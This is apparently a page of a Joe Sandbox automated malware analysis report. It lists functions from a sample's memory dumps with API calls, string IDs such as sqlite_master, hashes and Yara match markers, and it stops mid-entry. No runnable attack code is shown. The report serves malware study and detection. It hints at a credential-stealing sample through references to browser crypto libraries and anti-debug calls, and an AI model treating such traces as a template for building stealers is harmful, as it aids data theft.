                                                                                                                                                                                                              • Instruction ID: bddc60e8be839c6a4e41f071d56e47033984e2026629b8f845b85c3804584b91
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f835f54147bcaf7c0c5986e20db56fe5bb86786a5609c3d2f9d1aba58888d5b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2011E70500208FFEF118F61DC898AB7BBEFF493A5B108458F81597120DB369990EF60
                                                                                                                                                                                                              Function 00928048 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(00926724,00000000,00000001,00000000,?,00000000,00000000), ref: 00928060
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,00926724,?), ref: 0092806E
                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(00926724,00000000,00000001,00000000,?,00000000,00000000), ref: 00928084
                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,00926724,?), ref: 00928093
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4291131564-0
                                                                                                                                                                                                              • Opcode ID: 63f97ba58b12ce804af0bf51267c52c34e1dfac7cd687f4eb4ccaa1aec67c536
                                                                                                                                                                                                              • Instruction ID: 37c57bbd737aee0df1af7866057020945928e6b9d69117477646ca616ead6a22
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63f97ba58b12ce804af0bf51267c52c34e1dfac7cd687f4eb4ccaa1aec67c536
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5F0E770142234BBDB325F66DC4DEDB7FACEF0ABA0B100495F9099B254DB718980DAA1
                                                                                                                                                                                                              Function 6CA73EC0 Relevance: 4.3, Strings: 3, Instructions: 583COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: sqlite_$sqlite_master$sqlite_temp_master
                                                                                                                                                                                                              • API String ID: 0-4221611869
                                                                                                                                                                                                              • Opcode ID: 37a8108402aa51d1f62d2659be3b2c17eafc920a33ab5fc4b4fba1574d4285ff
                                                                                                                                                                                                              • Instruction ID: 8d2b6ba7aff238437c4d3545b21c718c23e8064985d281b96a0d5113f9c9ace1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37a8108402aa51d1f62d2659be3b2c17eafc920a33ab5fc4b4fba1574d4285ff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A22259397491954FD7248B2980601F6BBF2BF46358B2D85A8C9E59FF42D225ECC1CFA0
                                                                                                                                                                                                              Function 6CA43D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: htonl
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 2009864989-4108050209
                                                                                                                                                                                                              • Opcode ID: c6ef6b6ebdc164bf879246e2e18bc3c50d07507698de0b62c0f918c2c6a9d11b
                                                                                                                                                                                                              • Instruction ID: 37fd5826b5417cc37038f3d03f3b0c5e7bc46e1914bad6b45ed1f4e1704a0f12
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6ef6b6ebdc164bf879246e2e18bc3c50d07507698de0b62c0f918c2c6a9d11b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF514931E4B0798AEB1586BD88627FFBBF19B42724F1DC329C5E167AC0C27445869790
                                                                                                                                                                                                              Function 0092145B Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0092146D
                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL(00000000), ref: 00921474
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CurrentInformationQuery
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3953534283-0
                                                                                                                                                                                                              • Opcode ID: 44e4f45d68fb1c2e982a67a8ae933079625de35d33a35fa2a6065f52ecdf2297
                                                                                                                                                                                                              • Instruction ID: e8e5b7e3ad62b69abd0d3ce5b2e365b056fb786d2e1c55b616c93408c91dfafb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44e4f45d68fb1c2e982a67a8ae933079625de35d33a35fa2a6065f52ecdf2297
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74E01271650304F7EB109BA1DC0AF6A72ACDB40789F100155A21AE60D0DAB8EA00D7A5
                                                                                                                                                                                                              Function 6CA5AC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: winUnlock$winUnlockReadLock
                                                                                                                                                                                                              • API String ID: 0-3432436631
                                                                                                                                                                                                              • Opcode ID: 8106f3854d6a8382b86f5730c8e840c166658d20ea9818609c2d49e9016e3019
                                                                                                                                                                                                              • Instruction ID: 27156d07dd292cc2c0a26e02c749d88a15d3e80bc2600df2814e6e7e64258aa3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8106f3854d6a8382b86f5730c8e840c166658d20ea9818609c2d49e9016e3019
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 067179716083449BDB04CF29D895AAABBF5FF89314F14C61CF94997A01DB30E9C68BD1
                                                                                                                                                                                                              Function 6CB1ED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6CB1EE3D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_ArenaUtil
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2062749931-0
                                                                                                                                                                                                              • Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                              • Instruction ID: 93b058c825aebde3ee9267f535e85c8b74a792193d74d051e95f0181cfbd8e60
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED71D272E097858FEB18CF59C8846AEB7F2EB98304F15462DD85A97F91D730E900CB91
                                                                                                                                                                                                              Function 6CA54DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: winUnlockReadLock
                                                                                                                                                                                                              • API String ID: 0-4244601998
                                                                                                                                                                                                              • Opcode ID: f158511ca39a4d62ff5ea368e0ba90f97c03d13c66adb62a886f3b2e238f5a37
                                                                                                                                                                                                              • Instruction ID: 7a1e8b0c474e77504bee4345742ae96c571c9fcee02ddf82bafc04d2f62c51e9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f158511ca39a4d62ff5ea368e0ba90f97c03d13c66adb62a886f3b2e238f5a37
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1E12A70A183408FDB04DF29D489A5ABBF0BF89308F55961DF88997651EB30D9D5CF82
                                                                                                                                                                                                              Function 0094B6E6 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnumSystemLocalesA.KERNEL32(Function_0002B351,00000001), ref: 0094B6FF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnumLocalesSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2099609381-0
                                                                                                                                                                                                              • Opcode ID: cb3619fdb4fefbc5ad047955e2a878a7b49d6930f0d3bfa50c1d02aebd8a9e99
                                                                                                                                                                                                              • Instruction ID: dcc6989bfc11c72afd39ef5b0bafc96443c3d13066791c47b7255d06210d9292
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb3619fdb4fefbc5ad047955e2a878a7b49d6930f0d3bfa50c1d02aebd8a9e99
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15D05E71915B005BD7204F329949BA177A0EB90B1AF249849DC96494C0D7B4A5858601
                                                                                                                                                                                                              Function 009477BE Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0002777C), ref: 009477C3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                              • Opcode ID: 7c50f6de93af7aa19238741de09862f828f0c8c28d8c0ce1c736828713a7c732
                                                                                                                                                                                                              • Instruction ID: a7ead55452ba38287475ec90120709c23ebf3d5464be7323a5293e59fe7e45ee
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c50f6de93af7aa19238741de09862f828f0c8c28d8c0ce1c736828713a7c732
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 549002702AD7445A460117B16C0D80569D46ACC70BB810450A041C4054DB9050046652
                                                                                                                                                                                                              Function 0094CEBE Relevance: .5, Instructions: 489COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 22312dd7076624c71bde8b92e2a11d5b95e289a32f89c729d9f8e76f35fb007d
                                                                                                                                                                                                              • Instruction ID: 78cc54668e0ed93e0936dafe8d627fd6508533af37f9fe9bd5d92b124107c7ce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22312dd7076624c71bde8b92e2a11d5b95e289a32f89c729d9f8e76f35fb007d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0802D433D4A6B24B8F764EB944D0A2B7FA46E01B4431F47E9DDD03F196C216ED0A96E0
                                                                                                                                                                                                              Function 6CB8DCD0 Relevance: .4, Instructions: 371COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 61bb9c6ab39ad82d2954a0b5d6995b26d1fa9c3173d88bccf4b92510426349f3
                                                                                                                                                                                                              • Instruction ID: 1b9d0fd8b5cb18a9de86283f00ed916fc77780997f50cfaa5be9f82c009d95b3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61bb9c6ab39ad82d2954a0b5d6995b26d1fa9c3173d88bccf4b92510426349f3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82F15B75A022458FDB08CF29D484BAE77B2FF89314F294169D8099B751CB35ED42CBE1
                                                                                                                                                                                                              Function 0094DEAB Relevance: .4, Instructions: 355COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                              • Instruction ID: 4c31ff1ae535b109e604966c9c865672060b4b5e1e47d70ddb11156256d80b9b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3CC17E73D1F5B2098B36862D4418A3FEEA66ED2B4431FC3D5DCD03F189C62AAD1596D0
                                                                                                                                                                                                              Function 0094DAC3 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                              • Instruction ID: b15ec31062bf8dc61e30e74784bb79935ce897ae0488cf6c9514903a89fbe662
